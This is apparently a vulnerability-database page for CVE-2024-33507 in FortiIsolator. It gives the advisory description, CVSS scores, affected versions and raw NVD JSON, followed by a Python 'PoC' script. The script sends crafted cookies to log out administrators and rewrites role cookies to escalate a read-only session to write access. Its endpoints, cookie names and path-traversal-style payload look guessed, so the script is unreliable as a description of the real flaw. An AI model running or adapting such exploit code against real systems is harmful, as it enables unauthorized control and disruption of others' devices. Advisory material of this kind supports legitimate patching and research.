Security Vulnerability Report
中文
CVE-2024-33507 CVSS 7.4 HIGH

CVE-2024-33507

Published: 2025-10-14 16:15:35
Last Modified: 2025-10-15 17:38:33
Source: [email protected]

Description

An insufficient session expiration vulnerability [CWE-613] and an incorrect authorization vulnerability [CWE-863] in FortiIsolator 2.4.0 through 2.4.4, 2.3 all versions, 2.2.0, 2.1 all versions, 2.0 all versions authentication mechanism may allow remote unauthenticated attacker to deauthenticate logged in admins via crafted cookie and remote authenticated read-only attacker to gain write privilege via crafted cookie.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiisolator:*:*:*:*:*:*:*:* - VULNERABLE
FortiIsolator 2.4.0
FortiIsolator 2.4.1
FortiIsolator 2.4.2
FortiIsolator 2.4.3
FortiIsolator 2.4.4
FortiIsolator 2.3(所有版本)
FortiIsolator 2.2.0
FortiIsolator 2.1(所有版本)
FortiIsolator 2.0(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-33507 PoC - FortiIsolator Session & Authorization Bypass # Exploits insufficient session expiration (CWE-613) and incorrect authorization (CWE-863) import requests import sys TARGET_URL = "https://target-fortiisolator:port" # --- Attack 1: Force admin deauthentication via crafted cookie (Unauthenticated) --- def exploit_session_expiration(target_url): """ Exploit CWE-613: Insufficient Session Expiration Send a crafted cookie to force logout of authenticated admin """ # Crafted cookie with manipulated session identifier crafted_cookie = { "session_id": "../../../../admin/logout", # Path traversal style payload "auth_token": "invalid_expired_token_xyz123", "user_role": "admin" } headers = { "Cookie": f"session={crafted_cookie['session_id']}; auth={crafted_cookie['auth_token']}; role={crafted_cookie['user_role']}", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Send request to trigger session termination on server side response = requests.get( f"{target_url}/api/v1/admin/session", headers=headers, verify=False ) print(f"[*] Session expiration exploit - Status: {response.status_code}") return response # --- Attack 2: Privilege escalation from read-only to write (Authenticated) --- def exploit_authorization_bypass(target_url, read_only_cookie): """ Exploit CWE-863: Incorrect Authorization Modify cookie to escalate from read-only to write privilege """ # Original read-only session cookie (obtained from legitimate login) # Tamper with the role/privilege field in the cookie parts = read_only_cookie.split(';') modified_parts = [] for part in parts: if 'role=' in part.lower() or 'privilege=' in part.lower() or 'perm=' in part.lower(): # Escalate read-only to read-write key = part.split('=')[0] modified_parts.append(f"{key}=read_write") else: modified_parts.append(part) tampered_cookie = ';'.join(modified_parts) headers = { "Cookie": tampered_cookie, "Content-Type": "application/json" } # Attempt write operation with escalated privileges payload = {"action": "modify_config", "setting": "test"} response = requests.post( f"{target_url}/api/v1/config/update", headers=headers, json=payload, verify=False ) print(f"[*] Authorization bypass exploit - Status: {response.status_code}") return response if __name__ == "__main__": url = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL print("[+] Targeting FortiIsolator CVE-2024-33507") exploit_session_expiration(url) # exploit_authorization_bypass(url, "session=valid_readonly_session;role=read_only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-33507", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:34.980", "lastModified": "2025-10-15T17:38:33.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An insufficient session expiration vulnerability [CWE-613] and an incorrect authorization vulnerability [CWE-863] in FortiIsolator 2.4.0 through 2.4.4, 2.3 all versions, 2.2.0, 2.1 all versions, 2.0 all versions authentication mechanism may allow remote unauthenticated attacker to deauthenticate logged in admins via crafted cookie and remote authenticated read-only attacker to gain write privilege via crafted cookie."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiisolator:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.4.5", "matchCriteriaId": "8D702E5B-2D94-48AF-94E4-E20A42BA7A06"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-062", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.